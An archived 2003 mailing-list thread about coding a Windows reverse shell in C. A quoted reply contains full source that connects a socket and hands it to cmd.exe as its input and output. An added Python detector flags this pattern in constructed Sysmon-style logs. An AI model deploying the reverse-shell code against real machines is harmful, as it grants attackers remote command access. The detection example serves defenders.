Re[2]: Windows reverse Shell

From: Adik (netninjaat_private)
Date: Wed Feb 05 2003 - 01:03:03 PST


    Hello 3APA3A,
    
    Thnx for ur code. The one I wrote is absolutely the same without bind.
    In fact we don't need "bind", though David Litchfield mentions it in his
    Blackhat talk. So anyway, did u try compiling ur code? If not u should
    try, coz I c the same results, i.e. I get a connection on my netcat, but then
    it suddenly disconnects. No command prompt.
    
    Tuesday, February 4, 2003, 10:34:56 PM, you wrote:
    
    3> Return-Path: <3APA3Aat_private>
    3> X-Sieve: cmu-sieve 2.0
    3> Received: from woland.freenet.kg (woland.freenet.kg [212.112.99.34])
    3>         by mail.hotmail.kg (Hotmail.KG edition/Version 1.0) with ESMTP id h14GVEb17456
    3>         for <netninjaat_private>; Tue, 4 Feb 2003 21:31:14 +0500 (KGT)
    3> Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2])
    3>         by woland.freenet.kg (8.12.6/8.12.6) with ESMTP id h14HtUoc013643
    3>         for <netninjaat_private>; Tue, 4 Feb 2003 22:55:39 +0500
    3> Received: from anonymous.sandy.ru (anonymous.sandy.ru. [195.122.226.40])
    3>         by adm.sci-nnov.ru (8.11.6/8.11.6) with ESMTP id h14GYuu38518;
    3>         Tue, 4 Feb 2003 19:34:56 +0300 (MSK)
    3>         (envelope-from 3APA3Aat_private)
    3> Date: Tue, 4 Feb 2003 19:34:56 +0300
    3> From: 3APA3A <3APA3Aat_private>
    3> X-Mailer: The Bat! (v1.61)
    3> Reply-To: 3APA3A <3APA3Aat_private>
    3> Organization: http://www.security.nnov.ru
    3> X-Priority: 3 (Normal)
    3> Message-ID: <1939904491.20030204193456at_private>
    3> To: SecFocus <netninjaat_private>
    3> CC: vuln-devat_private
    3> Subject: Re: Windows reverse Shell
    3> In-Reply-To: <1028124981.20030204013745at_private>
    3> References: <1028124981.20030204013745at_private>
    3> MIME-Version: 1.0
    3> Content-Type: text/plain; charset=Windows-1251
    3> Content-Transfer-Encoding: 8bit
    
    3> Dear NetNinja,
    
    3> Code below successfully brings reverse shell to 127.0.0.1:7777.
    
    3> #include <windows.h>
    3> #include <winsock2.h>
    3> #include <stdio.h>
    
    3> int main(int argc, char* argv[]){
    3>  WSADATA wd;
    3>  HANDLE h;
    3>  SOCKET sock;
    3>  STARTUPINFO si;
    3>  PROCESS_INFORMATION  pi;
    3>  struct sockaddr_in sin;
    3>  int size = sizeof(sin);
    
    3>  memset(&sin, 0, sizeof(sin));
    3>  memset(&si, 0, sizeof(si));
    3>  WSAStartup(MAKEWORD( 1, 1 ), &wd);
    3>  sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    3>  sin.sin_family = AF_INET;
    3>  bind(sock, (struct sockaddr*)&sin, size);
    3>  sin.sin_port = htons(7777);
    3>  sin.sin_addr.s_addr = inet_addr("127.0.0.1");
    3>  connect(sock, (struct sockaddr*)&sin, size);
    3>  si.cb = sizeof(si);
    3>  si.dwFlags = STARTF_USESTDHANDLES;
    3>  si.hStdInput = si.hStdOutput = si.hStdError = sock;
    3>  CreateProcess(
    3>         NULL,
    3>         "cmd.exe",
    3>         NULL,
    3>         NULL,
    3>         TRUE,
    3>         0,
    3>         0,
    3>         NULL,
    3>         &si,
    3>         &pi
    3>  );
    3>  return 0;
    3> }
    
    3> --Monday, February 3, 2003, 10:37:45 PM, you wrote to vuln-devat_private:
    
    N>> Hello guys,
    
    N>> David Litchfield in his Blackhat talk talked about using the socket handle
    N>> from WSASocket() and passing that handle as a parameter for stdin, stdout
    N>> and stderr of the CreateProcess function. By doin it this way his reverse
    N>> cmd shellcode becomes much smaller. I tried coding that reverse
    N>> command shell in C, but couldn't get it to work. It simply connects to
    N>> my listening netcat listener and then disconnects. David Litchfield
    N>> used 4 functions to achieve that: WSASocket, bind, connect and
    N>> CreateProcess. A lil help would b appreciated on building this reverse
    N>> cmd shell. thanx.
    
    -- 
    Best regards,
     Adik                            mailto:netninjaat_private
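The technique the thread is about (WSASocket, connect, then CreateProcess with the socket handed in as stdin/stdout/stderr) has a telemetry signature that defenders can key on: the child shell never touches the network itself, because the socket belongs to the parent and is merely inherited, so the connection event is attributed to the parent process and the shell appears as its child moments later. The detection below is an added example written for this page, not code from the thread or from any of its posters. It assumes Sysmon-style fields (Event ID 3 NetworkConnect, Event ID 1 ProcessCreate) flattened into a key=value line format of my own choosing; the log lines are constructed, and rs.exe, the PIDs and the 192.0.2.25:7777 destination are made-up values.

```python
"""Flag a process that opens an outbound TCP connection and then spawns a
command shell: the socket-as-stdio pattern (WSASocket/connect/CreateProcess)
discussed in this thread.

Added illustrative example, not code from the thread. The log lines are
constructed, and their key=value layout is an assumed export of Sysmon
Event ID 3 (NetworkConnect) and Event ID 1 (ProcessCreate) fields, not
Sysmon's native XML."""
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (assumed layout: ISO timestamp, then key=value).
SAMPLE_LOG = r"""
2003-02-04T19:34:50.000 EventID=3 Image=C:\Program Files\Browser\browser.exe ProcessId=900 DestinationIp=203.0.113.10 DestinationPort=443 Initiated=true
2003-02-04T19:34:55.900 EventID=3 Image=C:\Users\test\rs.exe ProcessId=1234 DestinationIp=192.0.2.25 DestinationPort=7777 Initiated=true
2003-02-04T19:34:56.050 EventID=1 Image=C:\Windows\System32\cmd.exe ProcessId=1300 ParentProcessId=1234 ParentImage=C:\Users\test\rs.exe
2003-02-04T19:35:10.000 EventID=1 Image=C:\Windows\System32\cmd.exe ProcessId=1400 ParentProcessId=700 ParentImage=C:\Windows\explorer.exe
2003-02-04T19:35:20.000 EventID=1 Image=C:\Windows\System32\cmd.exe ProcessId=1500 ParentProcessId=900 ParentImage=C:\Program Files\Browser\browser.exe
"""

# key=value pairs; a value runs until the next " key=" so paths with spaces survive.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}
WINDOW = timedelta(seconds=5)  # how long after the connect a shell spawn is suspicious


def parse_line(line):
    """Split one log line into a dict of fields plus a parsed UtcTime."""
    ts_text, _, rest = line.strip().partition(" ")
    fields = dict(FIELD_RE.findall(rest))
    fields["UtcTime"] = datetime.fromisoformat(ts_text)
    return fields


def basename(image):
    """Last path component of a Windows image path, lower-cased."""
    return image.rsplit("\\", 1)[-1].lower()


def detect_socket_stdio_shells(lines, window=WINDOW):
    """Return alerts for shells whose parent initiated a connection within `window`.

    The shell itself generates no network event: the socket belongs to the
    parent and is only inherited as stdin/stdout/stderr, so Event ID 3 is
    attributed to the parent. That is why the join key is ParentProcessId."""
    events = sorted((parse_line(l) for l in lines if l.strip()),
                    key=lambda e: e["UtcTime"])
    connections = {}  # ProcessId -> outbound connect events seen so far
    alerts = []
    for ev in events:
        if ev.get("EventID") == "3" and ev.get("Initiated") == "true":
            connections.setdefault(ev["ProcessId"], []).append(ev)
        elif ev.get("EventID") == "1" and basename(ev.get("Image", "")) in SHELL_IMAGES:
            for conn in connections.get(ev.get("ParentProcessId"), []):
                delta = ev["UtcTime"] - conn["UtcTime"]
                # Only a shell spawned *after* the connect, and soon after, matches
                # the pattern; an old connection from the same PID is ignored.
                if timedelta(0) <= delta <= window:
                    alerts.append({
                        "parent_image": conn["Image"],
                        "parent_pid": conn["ProcessId"],
                        "destination": f'{conn["DestinationIp"]}:{conn["DestinationPort"]}',
                        "shell_pid": ev["ProcessId"],
                        "seconds_after_connect": delta.total_seconds(),
                    })
    return alerts


if __name__ == "__main__":
    for alert in detect_socket_stdio_shells(SAMPLE_LOG.splitlines()):
        print(alert)
```

On the constructed data only the rs.exe case fires: explorer.exe spawning cmd.exe has no connection at all, and browser.exe's connection is 30 seconds old when its cmd.exe child appears, outside the window. In production the join on ParentProcessId should be tightened with process GUIDs or creation times, since PIDs are reused, and the window tuned to the environment.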
    This archive was generated by hypermail 2b30 : Wed Feb 05 2003 - 09:22:27 PST